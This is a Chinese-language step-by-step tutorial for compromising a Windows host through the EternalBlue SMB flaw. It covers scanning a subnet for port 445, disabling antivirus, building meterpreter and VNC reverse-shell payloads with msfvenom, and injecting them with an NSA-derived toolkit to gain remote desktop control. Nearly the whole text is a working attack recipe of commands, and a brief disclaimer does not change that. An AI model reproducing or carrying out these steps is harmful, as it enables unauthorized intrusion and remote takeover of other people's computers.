声明:本教程仅供技术交流,请勿用于商业及非法用途,如产生法律纠纷与本人无关!
Step-1
下载并安装nmap
下载并安装metasploit-framework
下载并解压nsatools
密码: gnt7
注意:在安装部署MSF框架和nsatools前关闭或卸载所有杀软!
Step-2
在部署好所有工具之后,使用nmap对所在网段下的所有主机进行445端口扫描
选择一个目标主机进行详细扫描,这里我选择我的目标靶机
Step-3
确定目标主机的操作系统及版本信息后,有针对性的准备shellcode
新建cmd窗口,执行如下命令行以生成对应的dll注入文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=”这里填你们自己的主机IP” LPORT=4444 -f dll -o x86.dll
我自己的主机IP为10.100.231.23,故LHOST=10.100.231.23
若目标主机运行的是64位操作系统,则执行如下命令行
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=”你们自己的主机IP” LPORT=4444 -f dll -o x64.dll
将生成的dll文件拷贝到解压出来的nsatools/dll目录下,覆盖原有的文件
创建vncinject后门程序,为后面的远程桌面访问做准备
msfvenom -p windows/vncinject/reverse_tcp LHOST=”你们自己的主机IP” LPORT=5555 -f exe -o vnc.exe
Step-4
分别启动这两个会话监听,新建两个cmd窗口,分别执行如下命令行
msfconsole -q -r windows-reverse-tcp-4444.rc
msfconsole -q -r windows-vncinject-reverse-tcp-5555.rc
接下来启动nsatools,默认界面如图
选择永恒之蓝攻击模块,填入目标主机IP,端口默认445,系统WIN72K8R2,开始攻击
成功之后,你会看到输出信息当中会出现Backdoor installed!
Step-5
注入我们已经准备好的dll文件,填入目标主机IP,选择执行选项为RunDLL,系统位数根据实际选取,在这我选x86,文件路径对应也是选取x86.dll,其余选项保持不变,开始攻击
现在我们获得了目标主机的会话,接着再上传并执行vnc后门程序
此时右边的窗口也已经获取到了一个会话
我们使用VNC-Viewer来连接到映射到我们本地的这个5900端口
现在,我们已经可以通过vnc远程控制这台主机了